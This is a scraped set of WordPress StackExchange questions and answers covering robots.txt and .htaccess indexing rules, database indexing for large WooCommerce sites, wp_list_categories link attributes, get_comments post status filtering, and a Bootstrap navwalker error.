"text": "<p><strong>Using <code>robots.txt</code></strong></p>\n<p>Yes you could use a <code>robots.txt</code> file for this, simply add the following into this file:</p>\n<pre><code>User-agent: *\nDisallow: /wp-content/\n</code></pre>\n<p>Notice that you can have multiple <code>Disallow</code> directives if you would like to restrict indexing of other folders as well.</p>\n<pre><code>User-agent: *\nDisallow: /wp-content/\nDisallow: /wp-admin/\n</code></pre>\n<p>If you <em>would</em> like to allow indexing on a specific file in the folder you could use an <code>Allow</code> directive after <code>Disallow</code> like this:</p>\n<pre><code>Disallow: /wp-content/\nAllow: /wp-content/plugins/askimet.php\n</code></pre>\n<p>If you only would like to stop google from indexing you could instead add a user agent:</p>\n<pre><code>User-agent: Googlebot\n</code></pre>\n<p><strong>Using <code>set Header</code></strong></p>\n<p>You should also be able to use <code>.htaccess</code> for this. Try adding something like this in your <code>.htaccess</code> file:</p>\n<pre><code><Directory wp-content>\n Header set X-Robots-Tag "noindex"\n</Directory>\n</code></pre>\n<p>For the above to work you need to have <code>mod_headers</code> module enabled in apache. You can enable this module by executing:</p>\n<pre><code>sudo a2enmod headers\nsudo apachectl restart\n</code></pre>\n"
},
{
"answer_id": 374203,
"author": "Aditya Agarwal",
"author_id": 166927,
"author_profile": "https://wordpress.stackexchange.com/users/166927",
"pm_score": 2,
"selected": true,
"text": "<p>Here's the thing</p>\n<p>There are multiple ways to do what you want, from adding meta tags, to passing headers, but because, you tagged your question with robots.txt So i consider it off-topic to discuss any other solutions.</p>\n<p>Considering your demand you need to have this as your robots.txt\nThis disallowed access to wp-admin, but depending on use case, you may need ajax, so I gave it an exception, and then disallowed wp-content, and wp-includes.</p>\n<p>Change your robots.txt situated in root directory, like this</p>\n<pre><code>User-agent: *\nDisallow: /wp-admin/\nAllow: /wp-admin/admin-ajax.php\nNoindex: /wp-content/\nNoindex: /wp-includes/\n</code></pre>\n<p>This shall ask google to not index anything in wp-content and wp-includes, Google is slow and it would take its bot some time, to realize he is going at wrong place, so it would eventually remove it from its index.</p>\n<p><strong>The below HTACCESS METHOD is completely optional, the Robots.txt can do the trick with work, but HTACCESS is much more consistent method, therefore I couldnt resist myself from telling it</strong></p>\n<p>Incase you are willing to edit ht-access file, then that would be a better approach.</p>\n<p>I myself use it on my site. My code below if put in htaccess files, blocks all PHP and backend specific files, but allows all images, videos, pdfs and various similar file formats to be indexed by Google and others.</p>\n<pre><code># Serves only static files\nRewriteCond %{REQUEST_FILENAME} -f\nRewriteRule ^wp-(content|includes)/([^/]+/)*([^/.]+\\.)+ (jp(e?g|2)?|png|gif|bmp|ico|css|js|swf|xml|xsl|html?|mp(eg[34])|avi|wav|og[gv]|xlsx?|docx?|pptx?|gz|zip|rar|pdf|xps|7z|[ot]tf|eot|woff2?|svg|od[tsp]|flv|mov)$ - [L]\nRewriteRule ^wp-(content|includes|admin/includes)/ - [R=404,L]\n\n</code></pre>\n"
},
{
"answer_id": 409315,
"author": "hamed fallahi",
"author_id": 225585,
"author_profile": "https://wordpress.stackexchange.com/users/225585",
"pm_score": 0,
"selected": false,
"text": "<p><strong>just add this to .htaccess</strong></p>\n<pre><code>#Serves only static files\nRewriteCond %{REQUEST_FILENAME} -d\nRewriteRule ^wp-content/uploads/ - [R=404,L]\n</code></pre>\n"
},
{
"answer_id": 414278,
"author": "Vinayak S.",
"author_id": 230402,
"author_profile": "https://wordpress.stackexchange.com/users/230402",
"pm_score": 0,
"selected": false,
"text": "<p><a href=\"https://i.stack.imgur.com/e2WGW.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/e2WGW.png\" alt=\"enter image description here\" /></a></p>\n<p>This id the correct robot.txt</p>\n<blockquote>\n<pre><code>User-agent: *\nDisallow: /wp-content/\nDisallow: /wp-admin/\n</code></pre>\n</blockquote>\n"
}
] | 2020/09/02 | [
"https://wordpress.stackexchange.com/questions/374197",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/105668/"
] | I received an error from google saying that I have mobile usability errors on my site.
the "page" that they are referring to is [www.example.com/wp-content/plugins/ag-admin](http://www.example.com/wp-content/plugins/ag-admin).
I'm not asking for help with that plugin, but trying to figure out how to make google not index that directory at all.
Is disallawing this in my robots.txt enough or should I even have to do that? | Here's the thing
There are multiple ways to do what you want, from adding meta tags, to passing headers, but because, you tagged your question with robots.txt So i consider it off-topic to discuss any other solutions.
Considering your demand you need to have this as your robots.txt
This disallowed access to wp-admin, but depending on use case, you may need ajax, so I gave it an exception, and then disallowed wp-content, and wp-includes.
Change your robots.txt situated in root directory, like this
```
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Noindex: /wp-content/
Noindex: /wp-includes/
```
This shall ask google to not index anything in wp-content and wp-includes, Google is slow and it would take its bot some time, to realize he is going at wrong place, so it would eventually remove it from its index.
**The below HTACCESS METHOD is completely optional, the Robots.txt can do the trick with work, but HTACCESS is much more consistent method, therefore I couldnt resist myself from telling it**
Incase you are willing to edit ht-access file, then that would be a better approach.
I myself use it on my site. My code below if put in htaccess files, blocks all PHP and backend specific files, but allows all images, videos, pdfs and various similar file formats to be indexed by Google and others.
```
# Serves only static files
RewriteCond %{REQUEST_FILENAME} -f
RewriteRule ^wp-(content|includes)/([^/]+/)*([^/.]+\.)+ (jp(e?g|2)?|png|gif|bmp|ico|css|js|swf|xml|xsl|html?|mp(eg[34])|avi|wav|og[gv]|xlsx?|docx?|pptx?|gz|zip|rar|pdf|xps|7z|[ot]tf|eot|woff2?|svg|od[tsp]|flv|mov)$ - [L]
RewriteRule ^wp-(content|includes|admin/includes)/ - [R=404,L]
``` |
374,220 | <p>We've got a WP+woocommerce site that is over 8 years old. The site has over 60,000 users and a similar number of orders. The wp_postmeta has over 4,000,000 records and wp_usermeta has over 1,500,000. This is causing all kinds of issues because the site was not updated regularly. The site wants to update the DB and it crashes every time, likely because of these tables.</p>
<p>Any ideas?</p>
| [
{
"answer_id": 374223,
"author": "Aditya Agarwal",
"author_id": 166927,
"author_profile": "https://wordpress.stackexchange.com/users/166927",
"pm_score": 0,
"selected": false,
"text": "<p>There are multiple Things to consider,</p>\n<ol>\n<li><p>No database is too big, to be handles, if you have a big database you probably have enough revenue also to get a really good hosting to handle it.</p>\n</li>\n<li><p>Databases have frequent reading and writing, not just postmeta and usermeta but in general, my advice is to optimize all database tables once a week. This will keep them great, you can do it via WP-Optimize plugin, or you can manually go to PHPmyAdmin and select all tables and run optimize command.</p>\n</li>\n<li><p>This I haven't tried much, but because your site is WooCommerce, and probably has lot of plugins, it can be that the sheer size of database isnt impacting, but the number of post meta queries are impacting you more. Therefore you can try with W3 Total Cache, it has got something called Database Caching, this can speed up the process of queries made to the database, hence improving performance and decreasing load.</p>\n</li>\n<li><p>On my own site, I use some code to store daily stats of all my authors in user meta, it used to add about 1,600 rows every day, and it slowly started to choke the server. 1,600 isn't much, but in 1 month, it becomes 48,000 and in a year, it can be 4,800,000 which is big. So I really investigated, and found 2 things,</p>\n<ul>\n<li><p>if you are storing lot of meta data of your own, then rather than using seprate keys, its better to put a serialized array. I used to have 200 authors, and had to store 8 things daily. Making total 1600 rows, but then I made those 8 into an Array, and serialized and stored under 1 key, making it 200 rows a day. This will not have size significant size impact on database but it surely speeds up site over time.</p>\n</li>\n<li><p>the next one is much more complicated, yet effective. WordPress is messy, we often install and uninstall many plugins, or may be switch plugins based on our needs, plugins often store the settings and configurations, into the database, and do not delete it on Uninstall because, when you reinstall the plugin in future, you dont have to reconfigure. But many a times this can add extra weight. I used to use Page Builders earlier, but then I ditched them for custom code. This was a good move, but few days later I saw my database still had lots of postmeta of elementor. So, I ran SQL query to delete the elementor and deleted a few thousand rows, making things cleaner and effective.</p>\n</li>\n</ul>\n</li>\n</ol>\n<p>Besides this as always, invest in a great hosting, and preferably get a dedicated server for unmatched experience, use latest possible versions of SQL and PHP</p>\n"
},
{
"answer_id": 404595,
"author": "O. Jones",
"author_id": 13596,
"author_profile": "https://wordpress.stackexchange.com/users/13596",
"pm_score": 1,
"selected": false,
"text": "<p>Modern MariaDB and MySQL versions allow your tables' keys to be more efficient. Better keys can help a lot to speed up the kinds of database queries WooCommerce (and core WordPress) use.</p>\n<p>If you have a recent MySQL version that can handle the DYNAMIC row format, these postmeta keys will help a lot.</p>\n<pre class=\"lang-sql prettyprint-override\"><code> PRIMARY KEY (`post_id`, `meta_key`, `meta_id`),\n UNIQUE KEY `meta_id` (`meta_id`),\n KEY `meta_key` (`meta_key`, `meta_value`(32), `post_id`, `meta_id`),\n KEY `meta_value` (`meta_value`(32), `meta_id`)\n</code></pre>\n<p><a href=\"https://wordpress.org/plugins/index-wp-mysql-for-speed/\" rel=\"nofollow noreferrer\">This plugin</a> installs those database keys for you. To avoid timeouts when installing the keys, you should run it with wp-cli.</p>\n<p><a href=\"https://wordpress.org/plugins/index-wp-users-for-speed/\" rel=\"nofollow noreferrer\">This plugin</a> mitigates some database inefficiencies with many users.</p>\n"
}
] | 2020/09/03 | [
"https://wordpress.stackexchange.com/questions/374220",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/182332/"
] | We've got a WP+woocommerce site that is over 8 years old. The site has over 60,000 users and a similar number of orders. The wp\_postmeta has over 4,000,000 records and wp\_usermeta has over 1,500,000. This is causing all kinds of issues because the site was not updated regularly. The site wants to update the DB and it crashes every time, likely because of these tables.
Any ideas? | Modern MariaDB and MySQL versions allow your tables' keys to be more efficient. Better keys can help a lot to speed up the kinds of database queries WooCommerce (and core WordPress) use.
If you have a recent MySQL version that can handle the DYNAMIC row format, these postmeta keys will help a lot.
```sql
PRIMARY KEY (`post_id`, `meta_key`, `meta_id`),
UNIQUE KEY `meta_id` (`meta_id`),
KEY `meta_key` (`meta_key`, `meta_value`(32), `post_id`, `meta_id`),
KEY `meta_value` (`meta_value`(32), `meta_id`)
```
[This plugin](https://wordpress.org/plugins/index-wp-mysql-for-speed/) installs those database keys for you. To avoid timeouts when installing the keys, you should run it with wp-cli.
[This plugin](https://wordpress.org/plugins/index-wp-users-for-speed/) mitigates some database inefficiencies with many users. |
374,269 | <p>Returning to WP after nine years – will the classic editor plugin allow me to pretend it's 2011 as I migrate my site over from squarespace?</p>
<p>I'd like to move my business website to self-hosted Wordpress. Previously, around 2011 in my old business, we used PHP/HTML/CSS in theme templates to create customizations for our Wordpress site.</p>
<p>It seems the entire customization paradigm has changed with WordPress & now focuses on plugins. My preference is make my customizations in raw theme files & to use the classic editor for the blog portion of the website.</p>
| [
{
"answer_id": 374223,
"author": "Aditya Agarwal",
"author_id": 166927,
"author_profile": "https://wordpress.stackexchange.com/users/166927",
"pm_score": 0,
"selected": false,
"text": "<p>There are multiple Things to consider,</p>\n<ol>\n<li><p>No database is too big, to be handles, if you have a big database you probably have enough revenue also to get a really good hosting to handle it.</p>\n</li>\n<li><p>Databases have frequent reading and writing, not just postmeta and usermeta but in general, my advice is to optimize all database tables once a week. This will keep them great, you can do it via WP-Optimize plugin, or you can manually go to PHPmyAdmin and select all tables and run optimize command.</p>\n</li>\n<li><p>This I haven't tried much, but because your site is WooCommerce, and probably has lot of plugins, it can be that the sheer size of database isnt impacting, but the number of post meta queries are impacting you more. Therefore you can try with W3 Total Cache, it has got something called Database Caching, this can speed up the process of queries made to the database, hence improving performance and decreasing load.</p>\n</li>\n<li><p>On my own site, I use some code to store daily stats of all my authors in user meta, it used to add about 1,600 rows every day, and it slowly started to choke the server. 1,600 isn't much, but in 1 month, it becomes 48,000 and in a year, it can be 4,800,000 which is big. So I really investigated, and found 2 things,</p>\n<ul>\n<li><p>if you are storing lot of meta data of your own, then rather than using seprate keys, its better to put a serialized array. I used to have 200 authors, and had to store 8 things daily. Making total 1600 rows, but then I made those 8 into an Array, and serialized and stored under 1 key, making it 200 rows a day. This will not have size significant size impact on database but it surely speeds up site over time.</p>\n</li>\n<li><p>the next one is much more complicated, yet effective. WordPress is messy, we often install and uninstall many plugins, or may be switch plugins based on our needs, plugins often store the settings and configurations, into the database, and do not delete it on Uninstall because, when you reinstall the plugin in future, you dont have to reconfigure. But many a times this can add extra weight. I used to use Page Builders earlier, but then I ditched them for custom code. This was a good move, but few days later I saw my database still had lots of postmeta of elementor. So, I ran SQL query to delete the elementor and deleted a few thousand rows, making things cleaner and effective.</p>\n</li>\n</ul>\n</li>\n</ol>\n<p>Besides this as always, invest in a great hosting, and preferably get a dedicated server for unmatched experience, use latest possible versions of SQL and PHP</p>\n"
},
{
"answer_id": 404595,
"author": "O. Jones",
"author_id": 13596,
"author_profile": "https://wordpress.stackexchange.com/users/13596",
"pm_score": 1,
"selected": false,
"text": "<p>Modern MariaDB and MySQL versions allow your tables' keys to be more efficient. Better keys can help a lot to speed up the kinds of database queries WooCommerce (and core WordPress) use.</p>\n<p>If you have a recent MySQL version that can handle the DYNAMIC row format, these postmeta keys will help a lot.</p>\n<pre class=\"lang-sql prettyprint-override\"><code> PRIMARY KEY (`post_id`, `meta_key`, `meta_id`),\n UNIQUE KEY `meta_id` (`meta_id`),\n KEY `meta_key` (`meta_key`, `meta_value`(32), `post_id`, `meta_id`),\n KEY `meta_value` (`meta_value`(32), `meta_id`)\n</code></pre>\n<p><a href=\"https://wordpress.org/plugins/index-wp-mysql-for-speed/\" rel=\"nofollow noreferrer\">This plugin</a> installs those database keys for you. To avoid timeouts when installing the keys, you should run it with wp-cli.</p>\n<p><a href=\"https://wordpress.org/plugins/index-wp-users-for-speed/\" rel=\"nofollow noreferrer\">This plugin</a> mitigates some database inefficiencies with many users.</p>\n"
}
] | 2020/09/03 | [
"https://wordpress.stackexchange.com/questions/374269",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/164/"
] | Returning to WP after nine years – will the classic editor plugin allow me to pretend it's 2011 as I migrate my site over from squarespace?
I'd like to move my business website to self-hosted Wordpress. Previously, around 2011 in my old business, we used PHP/HTML/CSS in theme templates to create customizations for our Wordpress site.
It seems the entire customization paradigm has changed with WordPress & now focuses on plugins. My preference is make my customizations in raw theme files & to use the classic editor for the blog portion of the website. | Modern MariaDB and MySQL versions allow your tables' keys to be more efficient. Better keys can help a lot to speed up the kinds of database queries WooCommerce (and core WordPress) use.
If you have a recent MySQL version that can handle the DYNAMIC row format, these postmeta keys will help a lot.
```sql
PRIMARY KEY (`post_id`, `meta_key`, `meta_id`),
UNIQUE KEY `meta_id` (`meta_id`),
KEY `meta_key` (`meta_key`, `meta_value`(32), `post_id`, `meta_id`),
KEY `meta_value` (`meta_value`(32), `meta_id`)
```
[This plugin](https://wordpress.org/plugins/index-wp-mysql-for-speed/) installs those database keys for you. To avoid timeouts when installing the keys, you should run it with wp-cli.
[This plugin](https://wordpress.org/plugins/index-wp-users-for-speed/) mitigates some database inefficiencies with many users. |
374,326 | <p>I'm using the <code>wp_list_categories()</code> function which generates an unordered list with list items and anchor tags for the categories. Is there any way to add HTML attributes to the <code><a></code> tags which hold the category links?</p>
<p>I'd like to add a <code>title</code> attribute which is the same as the category, and a <code>class</code> attribute, but looking at the docs, in the list of associative array properties I can't see how to do this?</p>
<p>The code I'm using is:</p>
<pre><code><?php
echo '<ul class="cat-sidebar-list">';
$args_list = array(
'taxonomy' => 'news_categories',
'show_count' => false,
'hierarchical' => true,
'hide_empty' => false,
'title_li' => '',
);
echo wp_list_categories($args_list);
echo '</ul>';
?>
</code></pre>
<p>Thanks in advance for any help.</p>
| [
{
"answer_id": 374460,
"author": "bueltge",
"author_id": 170,
"author_profile": "https://wordpress.stackexchange.com/users/170",
"pm_score": 1,
"selected": false,
"text": "<h3>Custom Walker</h3>\n<p>The function <a href=\"https://developer.wordpress.org/reference/functions/wp_list_categories/\" rel=\"nofollow noreferrer\">wp_list_categories</a> accepts a (custom) walker. That gives you the possibility to add a custom function that adds class and title attribute to the output. The function has no filter hook so that you have not the option to change the default output of the function.</p>\n<p>an example to use a custom walker at the function.</p>\n<pre><code>$args = array(\n 'orderby' => 'id',\n 'show_count' => 0,\n 'walker' => new My_Custom_Walker_Category(),\n);\nwp_list_categories($args);\n</code></pre>\n<p>The custom walker is an extension of the default, like (<a href=\"https://developer.wordpress.org/reference/classes/walker_category/\" rel=\"nofollow noreferrer\">Documentation</a>)</p>\n<pre><code>class My_Custom_Walker_Category extends Walker_Category {\n function start_el( &$output, $category, $depth = 0, $args = array(), $id = 0 ) {\n }\n}\n</code></pre>\n<h3>Only CSS classes</h3>\n<p>A simple solution is possible only for the CSS classes. The default walker has a filter hook to change, enhance the CSS classes - <a href=\"https://developer.wordpress.org/reference/hooks/category_css_class/\" rel=\"nofollow noreferrer\">category_css_class</a>. The filter has all parameters documented.</p>\n<pre><code> /**\n * Filters the list of CSS classes to include with each category in the list.\n *\n * @since 4.2.0\n *\n * @see wp_list_categories()\n *\n * @param array $css_classes An array of CSS classes to be applied to each list item.\n * @param object $category Category data object.\n * @param int $depth Depth of page, used for padding.\n * @param array $args An array of wp_list_categories() arguments.\n */\n $css_classes = implode( ' ', apply_filters( 'category_css_class', $css_classes, $category, $depth, $args ) );\n</code></pre>\n<h3>The Walker</h3>\n<p>More hooks and hints about the Walker class will you find inside <a href=\"https://developer.wordpress.org/reference/files/wp-includes/class-walker-category.php/\" rel=\"nofollow noreferrer\">the documentation</a>. The Walker has <a href=\"https://developer.wordpress.org/reference/files/wp-includes/class-walker-category.php/?post_type%5B%5D=wp-parser-hook\" rel=\"nofollow noreferrer\">three hooks</a>.</p>\n<ul>\n<li><code>category_description</code></li>\n<li><code>category_css_class</code></li>\n<li><code>category_list_link_attributes</code></li>\n</ul>\n"
},
{
"answer_id": 374511,
"author": "Trisha",
"author_id": 56458,
"author_profile": "https://wordpress.stackexchange.com/users/56458",
"pm_score": 0,
"selected": false,
"text": "<p>If you only wanted to output the category name as the title attribute, you could do that simply by entering the category name in the Category Description field because the default output is to use that field as the title attribute UNLESS you set that flag in $args to 0 (false - see use_desc_for_title the default is 1, true).</p>\n<p>But a simpler way to do what you want is to output the results of wp_list_categories() instead of echoing (set 'echo' to 0 instead of the default 1) and then you can set your HTML however you like for $output.</p>\n<p>So an example (similar to that found in the Codex) would be (remember you can remove/ignore any for which the default is what you want):</p>\n<pre><code>wp_list_categories( $args = '' ) {\n$defaults = array(\n 'child_of' => 0,\n 'current_category' => 0,\n 'depth' => 0,\n 'echo' => 0,\n 'exclude' => '',\n 'exclude_tree' => '',\n 'feed' => '',\n 'feed_image' => '',\n 'feed_type' => '',\n 'hide_empty' => 1,\n 'hide_title_if_empty' => false,\n 'hierarchical' => true,\n 'order' => 'ASC',\n 'orderby' => 'name',\n 'separator' => '<br />',\n 'show_count' => 0,\n 'show_option_all' => '',\n 'show_option_none' => __( 'No categories' ),\n 'style' => 'list',\n 'taxonomy' => 'category',\n 'title_li' => __( 'Categories' ),\n 'use_desc_for_title' => 1,\n)};\n\n$parsed_args = wp_parse_args( $args, $defaults );\n\n$categories = get_categories( $parsed_args );\n if ( ! empty( $categories ) ) {\n \n echo '<ul>';\n foreach ($categories as $category) {\n echo '<li class="' . esc_attr( $parsed_args['class'] ) . '">' . $parsed_args['title_li'];\n }\n\n echo '</ul>';\n }\n \n</code></pre>\n<p>Keep in mind that while you can add any additional style classes you want this way, the default is to output a class for each category ID, so you already have some granular style options built in. And as mentioned the default output for the title attribute is the Category Description so assuming you're not already using that field for an actual description, just putting the Category name there will do what you want without additional code.</p>\n<p>EDITED: Chewy, you can remove any lines in the $args (defaults) that are set as you already want them to be according to their defaults - you only need to list them if you are changing from what is the default per the Codex. In the list above, 'echo' is set to 0 meaning that it will return the results to you, not list them, which is why just below that in the foreach statement you have to open the UL, then loop through the results to create the LI for each one.</p>\n<p>THE ONLY reason I can see to do this is so you can <em>add</em> the styles you said in your OP that you want to add.....if you can live with the unique styles WP adds already (the category ID is added as a class to each category listed), then you don't need to do any of this, all you need to do is call wp_list_categories() in your template where you want them, and put your preferred Title Attribute in the category's Description field.</p>\n"
},
{
"answer_id": 374810,
"author": "Sally CJ",
"author_id": 137402,
"author_profile": "https://wordpress.stackexchange.com/users/137402",
"pm_score": 3,
"selected": true,
"text": "<p>The default walker used by <code>wp_list_categories()</code> (<a href=\"https://developer.wordpress.org/reference/classes/walker_category/\" rel=\"nofollow noreferrer\"><code>Walker_Category</code></a>) has a hook (a filter hook) named <a href=\"https://developer.wordpress.org/reference/hooks/category_list_link_attributes/\" rel=\"nofollow noreferrer\"><code>category_list_link_attributes</code></a> which you can use to add custom <code>title</code> and <code>class</code> (as well as other attributes like <code>data-xxx</code>) to the <em>anchor</em>/<code>a</code> tag (<code><a></code>) in the HTML list generated via <code>wp_list_categories()</code>.</p>\n<p>So for example, you can do something like:</p>\n<pre class=\"lang-php prettyprint-override\"><code>add_filter( 'category_list_link_attributes', 'my_category_list_link_attributes', 10, 2 );\nfunction my_category_list_link_attributes( $atts, $category ) {\n // Set the title to the category description if it's available. Else, use the name.\n $atts['title'] = $category->description ? $category->description : $category->name;\n\n // Set a custom class.\n $atts['class'] = 'custom-class category-' . $category->slug;\n// $atts['class'] .= ' custom-class'; // or append a new class\n// $atts['class'] = 'custom-class ' . $atts['class']; // or maybe prepend it\n\n return $atts;\n}\n</code></pre>\n"
}
] | 2020/09/05 | [
"https://wordpress.stackexchange.com/questions/374326",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/106972/"
] | I'm using the `wp_list_categories()` function which generates an unordered list with list items and anchor tags for the categories. Is there any way to add HTML attributes to the `<a>` tags which hold the category links?
I'd like to add a `title` attribute which is the same as the category, and a `class` attribute, but looking at the docs, in the list of associative array properties I can't see how to do this?
The code I'm using is:
```
<?php
echo '<ul class="cat-sidebar-list">';
$args_list = array(
'taxonomy' => 'news_categories',
'show_count' => false,
'hierarchical' => true,
'hide_empty' => false,
'title_li' => '',
);
echo wp_list_categories($args_list);
echo '</ul>';
?>
```
Thanks in advance for any help. | The default walker used by `wp_list_categories()` ([`Walker_Category`](https://developer.wordpress.org/reference/classes/walker_category/)) has a hook (a filter hook) named [`category_list_link_attributes`](https://developer.wordpress.org/reference/hooks/category_list_link_attributes/) which you can use to add custom `title` and `class` (as well as other attributes like `data-xxx`) to the *anchor*/`a` tag (`<a>`) in the HTML list generated via `wp_list_categories()`.
So for example, you can do something like:
```php
add_filter( 'category_list_link_attributes', 'my_category_list_link_attributes', 10, 2 );
function my_category_list_link_attributes( $atts, $category ) {
// Set the title to the category description if it's available. Else, use the name.
$atts['title'] = $category->description ? $category->description : $category->name;
// Set a custom class.
$atts['class'] = 'custom-class category-' . $category->slug;
// $atts['class'] .= ' custom-class'; // or append a new class
// $atts['class'] = 'custom-class ' . $atts['class']; // or maybe prepend it
return $atts;
}
``` |
374,371 | <p>This is my loop:</p>
<pre><code><?php $comments = get_comments(array(
'status' => 'approve',
'type' => 'comment',
'number' => 10,
'post_status' => 'public'
)); ?>
<ul class="sidebar-comments">
<?php foreach ($comments as $comment)
{ ?>
<li>
<div><?php echo get_avatar($comment, $size = '35'); ?></div>
<em style="font-size:12px"><?php echo strip_tags($comment->comment_author); ?></em> (<a href="<?php echo get_option('home'); ?>/?p=<?php echo ($comment->comment_post_ID); ?>/#comment-<?php echo ($comment->comment_ID); ?>">link</a>)<br>
<?php echo wp_html_excerpt($comment->comment_content, 35); ?>...
</li>
<?php
} ?>
</ul>
</code></pre>
<p>This always gives an empty result (no errors).
If I remove <code>'post_status' => 'public'</code> from the get_comments arguments, the function works, comments load but also comments from private posts (which I don't want).</p>
<p>Any ideas on why <code>'post_status' => 'public'</code> is not working?</p>
| [
{
"answer_id": 374378,
"author": "botondcs",
"author_id": 115678,
"author_profile": "https://wordpress.stackexchange.com/users/115678",
"pm_score": 2,
"selected": true,
"text": "<p>Try <code>'post_status' => 'publish',</code> that should do the trick.</p>\n<p>See <a href=\"https://developer.wordpress.org/reference/functions/get_post_statuses/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/reference/functions/get_post_statuses/</a> for more details.</p>\n"
},
{
"answer_id": 374380,
"author": "Cyclonecode",
"author_id": 14870,
"author_profile": "https://wordpress.stackexchange.com/users/14870",
"pm_score": 0,
"selected": false,
"text": "<p>I am not sure if <code>public</code> is a valid status, but you could just filter out the private comments before the actual loop:</p>\n<pre><code><?php $comments = get_comments(array(\n 'status' => 'approve',\n 'type' => 'comment',\n 'number' => 10,\n 'post_status' => 'publish'\n)); \n$comments = array_filter($comments, function ($item)) {\n return ($item->comment_status !== 'private');\n});\n?>\n</code></pre>\n"
}
] | 2020/09/06 | [
"https://wordpress.stackexchange.com/questions/374371",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/23296/"
] | This is my loop:
```
<?php $comments = get_comments(array(
'status' => 'approve',
'type' => 'comment',
'number' => 10,
'post_status' => 'public'
)); ?>
<ul class="sidebar-comments">
<?php foreach ($comments as $comment)
{ ?>
<li>
<div><?php echo get_avatar($comment, $size = '35'); ?></div>
<em style="font-size:12px"><?php echo strip_tags($comment->comment_author); ?></em> (<a href="<?php echo get_option('home'); ?>/?p=<?php echo ($comment->comment_post_ID); ?>/#comment-<?php echo ($comment->comment_ID); ?>">link</a>)<br>
<?php echo wp_html_excerpt($comment->comment_content, 35); ?>...
</li>
<?php
} ?>
</ul>
```
This always gives an empty result (no errors).
If I remove `'post_status' => 'public'` from the get\_comments arguments, the function works, comments load but also comments from private posts (which I don't want).
Any ideas on why `'post_status' => 'public'` is not working? | Try `'post_status' => 'publish',` that should do the trick.
See <https://developer.wordpress.org/reference/functions/get_post_statuses/> for more details. |
374,407 | <p>I got an auction theme (adifier) and i'm trying to add a button to a specific ads category.</p>
<p>Tried a few codes but none seem to work, probably i don't know how to alter it properly. I got the category 3D Design where users should download the files that are uploaded from account page (where I should add another button with upload (I got I plugin with the upload button but don't know how to add it on the account page) ). Thanks in advance for any kind of help!</p>
<pre class="lang-php prettyprint-override"><code>add_action( 'adifier_single_product_description', 'extra_button_on_product_page', 9 );
function extra_button_on_product_page() {
global $post, $product;
if ( has_term( 'accessories1-3d-design', 'product_cat' ) ) {
echo '<a class="button" href="www.test.com">Extra Button</a>';`
add_action( 'adifier_3d-design_description', 'extra_button_on_product_category_description', 9 );
function extra_button_on_product_category_description() {
if ( is_product_category('accessories1') ) {
echo '<a class="button" href="www.test.com">Extra Button</a>';
}
}
</code></pre>
| [
{
"answer_id": 374378,
"author": "botondcs",
"author_id": 115678,
"author_profile": "https://wordpress.stackexchange.com/users/115678",
"pm_score": 2,
"selected": true,
"text": "<p>Try <code>'post_status' => 'publish',</code> that should do the trick.</p>\n<p>See <a href=\"https://developer.wordpress.org/reference/functions/get_post_statuses/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/reference/functions/get_post_statuses/</a> for more details.</p>\n"
},
{
"answer_id": 374380,
"author": "Cyclonecode",
"author_id": 14870,
"author_profile": "https://wordpress.stackexchange.com/users/14870",
"pm_score": 0,
"selected": false,
"text": "<p>I am not sure if <code>public</code> is a valid status, but you could just filter out the private comments before the actual loop:</p>\n<pre><code><?php $comments = get_comments(array(\n 'status' => 'approve',\n 'type' => 'comment',\n 'number' => 10,\n 'post_status' => 'publish'\n)); \n$comments = array_filter($comments, function ($item)) {\n return ($item->comment_status !== 'private');\n});\n?>\n</code></pre>\n"
}
] | 2020/09/07 | [
"https://wordpress.stackexchange.com/questions/374407",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/194276/"
] | I got an auction theme (adifier) and i'm trying to add a button to a specific ads category.
Tried a few codes but none seem to work, probably i don't know how to alter it properly. I got the category 3D Design where users should download the files that are uploaded from account page (where I should add another button with upload (I got I plugin with the upload button but don't know how to add it on the account page) ). Thanks in advance for any kind of help!
```php
add_action( 'adifier_single_product_description', 'extra_button_on_product_page', 9 );
function extra_button_on_product_page() {
global $post, $product;
if ( has_term( 'accessories1-3d-design', 'product_cat' ) ) {
echo '<a class="button" href="www.test.com">Extra Button</a>';`
add_action( 'adifier_3d-design_description', 'extra_button_on_product_category_description', 9 );
function extra_button_on_product_category_description() {
if ( is_product_category('accessories1') ) {
echo '<a class="button" href="www.test.com">Extra Button</a>';
}
}
``` | Try `'post_status' => 'publish',` that should do the trick.
See <https://developer.wordpress.org/reference/functions/get_post_statuses/> for more details. |
374,523 | <p><a href="https://i.stack.imgur.com/DkULs.jpg" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/DkULs.jpg" alt="enter image description here" /></a>Trying to implement <code>wp-bootstrap-navwalker.php</code> into my made from scratch template for wordpress.<br>
The File for the <code>class-wp-bootstrap-navwalker.php</code> is located in the root directory of my theme.</p>
<p><strong>functions.php</strong></p>
<pre><code>function register_navwalker()
{
require_once get_template_directory() . '/class-wp-bootstrap-navwalker.php';<br>
}
add_action( 'after_setup_theme', 'register_navwalker' );
</code></pre>
<p>register_nav_menus( array(
'primary' => __( 'Primary Menu', 'primary' ),
) );</p>
<p><strong>cover.php</strong>
With the code below within the <code><nav> and </nav></code> tags</p>
<pre><code> <?php
wp_nav_menu( array(
'theme_location' => 'top-menu',
'depth' => 2,
'container' => 'div',
'container_class' => 'collapse navbar-collapse',
'container_id' => 'bs-example-navbar-collapse-1',
'menu_class' => 'nav navbar-nav',
'fallback_cb' => 'WP_Bootstrap_Navwalker::fallback',
'walker' => new WP_Bootstrap_Navwalker(),
) );
?>
</code></pre>
<p>When I save changes and reload my website, I get get the wp-bootstrap-navwalker page from github.</p>
<p>I've checked the source of the page and see this at the footer:
<b>Fatal error</b>: Uncaught Error: Class 'WP_Bootstrap_Navwalker' not found in C:\laragon\www\VzyulTech\wp-content\themes\Version2\index.php:17
Stack trace:
#0 C:\laragon\www\VzyulTech\wp-includes\template-loader.php(106): include()
#1 C:\laragon\www\VzyulTech\wp-blog-header.php(19): require_once('C:\laragon\www\...')
